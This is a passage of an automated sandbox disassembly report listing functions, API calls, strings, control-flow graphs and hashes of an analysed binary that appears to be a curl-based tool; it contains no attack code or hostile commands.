                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F4,?,?,?), ref: 00E01E9D
                                    • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?), ref: 00E01EAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: BufferConsoleHandleInfoScreenstrtol
                                    • String ID: COLUMNS
                                    • API String ID: 283564500-2475376301
                                    • Opcode ID: 93f843463100c6d93a5905bf3bb9181b571a63c20ed2de6e5c4bf6fc906d3635
                                    • Instruction ID: 4c2c6baaf557bf419a734790b1639e3d2316fbc23e273ac8af35230352832018
                                    • Opcode Fuzzy Hash: 93f843463100c6d93a5905bf3bb9181b571a63c20ed2de6e5c4bf6fc906d3635
                                    • Instruction Fuzzy Hash: A83192705006048FDB24DF69D884ABEB7F4EF44318F1016ADD846AB6D2E735ED8ACB50
                                    Function 00E34E72 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 908 e34e72-e34e7a 909 e34ed4-e34ed7 908->909 910 e34e7c-e34ea8 call e10b38 call e1d33a 908->910 915 e34eaa-e34eba GetProcAddress 910->915 916 e34ecf-e34ed3 910->916 915->916 917 e34ebc-e34ecd 915->917 917->909 917->916
                                    APIs
                                      • Part of subcall function 00E10B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                      • Part of subcall function 00E10B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                      • Part of subcall function 00E1D33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D34B
                                      • Part of subcall function 00E1D33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D363
                                      • Part of subcall function 00E1D33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00E57348,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D374
                                      • Part of subcall function 00E1D33A: LoadLibraryExA.KERNELBASE(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3B6
                                    • GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,00E1D2C2), ref: 00E34EB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
                                    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                    • API String ID: 2293913591-3788156360
                                    • Opcode ID: f75f3782ec3c614a35a3249369f497285768f53cb090db69b356262ffb006011
                                    • Instruction ID: 4e9cc62de72157a0381ee57fed49e42316a3fdab3234a56c8e208970e353570e
                                    • Opcode Fuzzy Hash: f75f3782ec3c614a35a3249369f497285768f53cb090db69b356262ffb006011
                                    • Instruction Fuzzy Hash: FCF0B4B26547125EEB153B3A7C2AB5B2685ABC078DF016535E501F91C5EAB4DC058640
                                    Function 00E21CDF Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 920 e21cdf-e21d06 calloc * 2 922 e21d10-e21d34 calloc * 2 920->922 923 e21d08-e21d0b 920->923 926 e21d36-e21d48 free 922->926 927 e21d4a-e21d5d call e21aee 922->927 924 e21dd3-e21dd6 923->924 926->923 931 e21d98-e21dce free call e1d126 call e214fa free 927->931 932 e21d5f-e21d96 call e27f41 927->932 936 e21dcf-e21dd2 931->936 932->936 936->924
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00E12254,?,?,?,00E08B8E), ref: 00E21CFE
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E12254,?,?,?,00E08B8E), ref: 00E21D28
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08B8E), ref: 00E21D45
                                      • Part of subcall function 00E21AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,766B1980,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21AF5
                                      • Part of subcall function 00E21AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B03
                                      • Part of subcall function 00E21AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B11
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00E08B8E), ref: 00E21DAC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08B8E), ref: 00E21DCC
                                      • Part of subcall function 00E27F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28006
                                      • Part of subcall function 00E27F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28023
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$__acrt_iob_func$calloc
                                    • String ID:
                                    • API String ID: 3275786289-0
                                    • Opcode ID: 058376c1413af033591847393e9eec6a0d00f852a8bbe973e1f6eeffdff7160b
                                    • Instruction ID: 5a457fd63b9d4444fd9275a640f30834f505954317e09b14a466cdfd91d3efdf
                                    • Opcode Fuzzy Hash: 058376c1413af033591847393e9eec6a0d00f852a8bbe973e1f6eeffdff7160b
                                    • Instruction Fuzzy Hash: E621B431744616EFDB18AF25FC156ADBFE4FF84361B20416AE41AF72E1DBB429048B90
                                    Function 00E0CF30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 92COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 942 e0cf30-e0cf43 call e032d3 945 e0cf54-e0cfd2 calloc * 2 call e2ecd9 call e1963b * 5 942->945 946 e0cf45-e0cf52 call e09199 942->946 964 e0cfd5-e0cfe9 call e0da2f 945->964 950 e0ceee-e0cef4 946->950 967 e0cfeb-e0cfed 964->967 968 e0cfef-e0cffd call e0cd40 964->968 967->964 967->968 970 e0d002-e0d010 call e1978f 968->970 970->950 973 e0d016-e0d022 call e0343b call e03460 970->973 973->950
                                    APIs
                                      • Part of subcall function 00E032D3: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 00E032F6
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E0CF70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callocmalloc
                                    • String ID: hnd = curl_easy_init();$out of memory$Q
                                    • API String ID: 1635859522-3006749264
                                    • Opcode ID: 86927d3fee0762ded6dd7fd3313835eb7efd36dd156414318c3caf32323a6878
                                    • Instruction ID: f918d187683576853e7119fb9e89e881d588cf2e3825b9b1b5da2570485176c4
                                    • Opcode Fuzzy Hash: 86927d3fee0762ded6dd7fd3313835eb7efd36dd156414318c3caf32323a6878
                                    • Instruction Fuzzy Hash: D2217732B0031067CB24AB70AC467AF7BD59F40360F202025F90AB73C7DE709E8582D0
                                    Function 00E121C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 978 e121c0-e121c7 979 e12234 978->979 980 e121c9-e121d1 978->980 980->979 981 e121d3-e121da 980->981 982 e121f7-e12205 981->982 983 e121dc-e121f6 981->983 984 e12207-e12215 FreeLibrary 982->984 985 e1221c-e12225 call e34ed8 982->985 983->982 984->985 989 e12227 WSACleanup 985->989 990 e1222d 985->990 989->990 990->979
                                    APIs
                                    • FreeLibrary.KERNELBASE(00000000,?,00E08EF6), ref: 00E12208
                                    • WSACleanup.WS2_32 ref: 00E12227
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CleanupFreeLibrary
                                    • String ID: xk
                                    • API String ID: 470324515-2543109834
                                    • Opcode ID: 02bc4ede9f48c5f5425c01dd57a9ff5ffca85398035ca2ec49f12d065cfa782b
                                    • Instruction ID: d82fccc09a7dd7f6e2a2210eedfc0aca3353f555c745caa2254222e6d7f5fb2d
                                    • Opcode Fuzzy Hash: 02bc4ede9f48c5f5425c01dd57a9ff5ffca85398035ca2ec49f12d065cfa782b
                                    • Instruction Fuzzy Hash: F6F03C762112408FDB299F2AFD4879A3BE8B70939AF1410A9D601F71B1C7B49C5CCB11
                                    Function 00E0CA6A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 992 e0ca6a-e0ca6f 993 e0ca75-e0ca78 992->993 994 e0cb6b-e0cb6f 992->994 995 e0ca7a-e0ca8a call e09199 993->995 996 e0ca8f-e0ca97 993->996 995->994 998 e0cb50-e0cb52 996->998 999 e0cb58-e0cb5f 998->999 1000 e0ca9c-e0caad call e0923b 998->1000 1002 e0cb61-e0cb64 call e09b4c 999->1002 1003 e0cb69 999->1003 1000->999 1007 e0cab3-e0cab6 1000->1007 1002->1003 1003->994 1008 e0cac7-e0cae1 call e122be call e09327 1007->1008 1009 e0cab8-e0cac1 call e0336a 1007->1009 1015 e0cae6-e0caef 1008->1015 1009->999 1009->1008 1016 e0caf1-e0cafd Sleep 1015->1016 1017 e0caff-e0cb05 1015->1017 1016->998 1018 e0cb07-e0cb0a 1017->1018 1019 e0cb3b 1017->1019 1018->1019 1021 e0cb0c-e0cb0f 1018->1021 1020 e0cb3f-e0cb4e call e0920d 1019->1020 1020->998 1020->999 1021->1019 1023 e0cb11-e0cb15 1021->1023 1023->1019 1025 e0cb17-e0cb1a 1023->1025 1025->1019 1026 e0cb1c-e0cb1e 1025->1026 1027 e0cb20-e0cb24 1026->1027 1028 e0cb26-e0cb39 call e0cd02 1026->1028 1027->1019 1027->1028 1028->1019 1028->1020
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: no transfer performed
                                    • API String ID: 0-1612002148
                                    • Opcode ID: 6ebd4914d2a56949a4d432673d75192c08c5f3504851303d51403b9e29954be9
                                    • Instruction ID: 220a62f99fc2dcc7f5a5648441bc3afd68a28615e47a252e90e6fe12879bd976
                                    • Opcode Fuzzy Hash: 6ebd4914d2a56949a4d432673d75192c08c5f3504851303d51403b9e29954be9
                                    • Instruction Fuzzy Hash: 1E31E572E0060A6BCB25DBB894867AD77F0AB44358F346BA5D801B72C6DA31DDC58B80
                                    Function 00E18B08 Relevance: 3.1, APIs: 2, Instructions: 72networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSACloseEvent.WS2_32(?), ref: 00E18BC2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E18BD7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CloseEventfree
                                    • String ID:
                                    • API String ID: 126896923-0
                                    • Opcode ID: d169eeb7e0a3f845573d53089fca88d82178863869870914aef608da01c63aa6
                                    • Instruction ID: 6f686696b5fd3dbb15290cd621113466fdb483a7488af630a5603b758d898005
                                    • Opcode Fuzzy Hash: d169eeb7e0a3f845573d53089fca88d82178863869870914aef608da01c63aa6
                                    • Instruction Fuzzy Hash: A421F2B6A04B21DFD729EB21D954BAAB3E1FF54326F10A819D44232591CF74AC85CBD0
                                    Function 00E0E08F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,?,00000000,00000000,00000000,?,00E0DD03,?), ref: 00E0E0C0
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0E0FB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfgets
                                    • String ID:
                                    • API String ID: 4248516992-0
                                    • Opcode ID: 28a7e627880fa27501c86414aaa90f74e7b2d4df12c9a1eb322b5179880b8ca0
                                    • Instruction ID: 5f05aa7dcbb2d1497d085ff9ee1834635c3f0fbfc6177a36f82b99b148abf71c
                                    • Opcode Fuzzy Hash: 28a7e627880fa27501c86414aaa90f74e7b2d4df12c9a1eb322b5179880b8ca0
                                    • Instruction Fuzzy Hash: B31148356043069ADB158F68DC01BE9B3E89F09355F1458ADE685F3281EAF1AEC88B64
                                    Function 00E5131D Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E5167B: GetModuleHandleW.KERNEL32(00000000,00E512E6), ref: 00E5167D
                                    • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E5132F
                                    • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,00E6D000,00000014), ref: 00E5135E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: HandleModule_c_exit_exit
                                    • String ID:
                                    • API String ID: 750871209-0
                                    • Opcode ID: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
                                    • Instruction ID: 214cee366c6e47f1a73816631676a31b9321350dec2b92fb7ad919e2903dd8ba
                                    • Opcode Fuzzy Hash: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
                                    • Instruction Fuzzy Hash: CFE08631D043498FCF209B94D9423DCB7B1FB41726F101999DD1137691D73518088790
                                    Function 00E2E990 Relevance: 3.0, APIs: 2, Instructions: 19networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000017,00000002,00000000), ref: 00E2E9A6
                                    • closesocket.WS2_32(00000000), ref: 00E2E9B2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: closesocketsocket
                                    • String ID:
                                    • API String ID: 2760038618-0
                                    • Opcode ID: fac6be17d732a0ab487d8c95376ee1357757a69c3280df9de101161d4ba814b9
                                    • Instruction ID: 72b9b3143273f82c6c93f95ad3021b137163ca2436bd4f9978ddf7d7b834c3cc
                                    • Opcode Fuzzy Hash: fac6be17d732a0ab487d8c95376ee1357757a69c3280df9de101161d4ba814b9
                                    • Instruction Fuzzy Hash: 52D095741452105FDD144B705CADFA737187B0131BF0476E5F422AB3D0C3104C069620
                                    Function 00E10B16 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                    Download Yara Rule
                                    APIs
                                    • _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,00E02077,?,00008501,00000180), ref: 00E10B2D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _open
                                    • String ID:
                                    • API String ID: 4183159743-0
                                    • Opcode ID: 83033d9d16d33a880ad76269d3d05dec30349b3e594d77b9c90e6044229a655f
                                    • Instruction ID: 181afa67cbc92f334a0d8b68d45b7fb8d6ed89cef7726d1711b00adadb69bd4b
                                    • Opcode Fuzzy Hash: 83033d9d16d33a880ad76269d3d05dec30349b3e594d77b9c90e6044229a655f
                                    • Instruction Fuzzy Hash: 9CD0123100020DAFCF014F65EC0599A37E8AF44355F00C414FD2C84020D771DA74AF40
                                    Function 00E031C0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetConsoleMode.KERNELBASE(00E031F4), ref: 00E031D9
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ConsoleMode
                                    • String ID:
                                    • API String ID: 4145635619-0
                                    • Opcode ID: 60b7fc14adeea4362e094f6aad12ded73a707bd9422868bbbfd205990eb66623
                                    • Instruction ID: 7417b35b4eb8a610c6860f810ccd4f9cd60588574e5cdb71f7331f5d27677467
                                    • Opcode Fuzzy Hash: 60b7fc14adeea4362e094f6aad12ded73a707bd9422868bbbfd205990eb66623
                                    • Instruction Fuzzy Hash: F8C04C31206A019FCF07CF3ABD255153AA5AB4A3863001474D657F5174DB61CD56DB50
                                    Function 00E34ED8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNELBASE(00000000,00E12221,?,00E08EF6), ref: 00E34EE2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 471c699d7dc5965caae2cc2f35c98c49b8108ea82e25cc68ae8af0606e531902
                                    • Instruction ID: 03cb703b5205cabf9988f8019781fe080e2a1f54aa7a08abbb424f00dccfcd86
                                    • Opcode Fuzzy Hash: 471c699d7dc5965caae2cc2f35c98c49b8108ea82e25cc68ae8af0606e531902
                                    • Instruction Fuzzy Hash: C9C00276521A428FD7108F2AFD1871737A4B70079BF415425D102E54A2D7B89C1CCA10
                                    Function 00E17B5D Relevance: 1.3, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17B80
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: d19e4c0172039180846d6bbf1510fe66f37f8fd4c6673a9fc1e7bd49a89da14b
                                    • Instruction ID: 1a7d7beeb3b6796f50cb77fc25f4309698a3a81efc737f240a5d048db0823449
                                    • Opcode Fuzzy Hash: d19e4c0172039180846d6bbf1510fe66f37f8fd4c6673a9fc1e7bd49a89da14b
                                    • Instruction Fuzzy Hash: EDE086B271E5159EFB489A28FC00B99B3EAEB84B20F001537D119D3154DBB46C814690

                                    Non-executed Functions

                                    Function 00E1FAEC Relevance: 106.2, APIs: 34, Strings: 26, Instructions: 1200stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000000,00000000,?,00E209DF,?,00000001,0000000C,00000000,00000000,00000001), ref: 00E1FB30
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1FB5E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1FBA1
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FBAC
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Secure-,0000005F,00000009), ref: 00E1FD02
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Host-,?,00000007), ref: 00E1FD23
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1FE2F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FE73
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FFC8
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1FFE5
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2012C
                                    • _strrchr.LIBCMT ref: 00E2013A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2016E
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,#HttpOnly_,0000000A), ref: 00E201D0
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E201F0
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E20201
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E20610
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E206CC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E206E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E206F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20708
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2071C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20730
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20744
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20758
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E20778
                                      • Part of subcall function 00E1F9D3: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F9EA
